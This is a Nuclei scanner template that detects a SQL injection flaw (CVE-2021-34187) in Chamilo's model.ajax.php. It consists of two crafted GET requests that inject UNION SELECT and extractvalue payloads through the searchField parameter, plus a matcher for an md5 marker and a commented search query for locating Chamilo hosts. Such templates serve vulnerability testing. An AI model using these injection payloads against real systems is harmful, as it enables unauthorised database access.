id: CVE-2021-34187

info:
  name: Chamilo model.ajax.php SQLi (CVE-2021-34187)
  author: SleepingBag945
  severity: high
  description: |
    The system supports the creation of teaching content, remote training and online quizzes. 
    There is a SQL injection vulnerability in Chamilo, which originates from Chamilo's main/inc/ajax/model.ajax.php which allows SQL injection through the searchField, filters or filters2 parameters.
  # metadata:
  #   fofa-query: banner="X-Powered-By: Chamilo" || header="X-Powered-By: Chamilo"
  tags: sqli

http:
  - raw:
      - |
        GET /main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5(111))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0  HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5(111)))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0  HTTP/1.1
        Host: {{Hostname}}



    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"698d51a19d8a121ce581499d7b701668")'
          - 'status_code_2 == 200 && contains(body_2,"698d51a19d8a121ce581499d7b701668")'
        condition: or
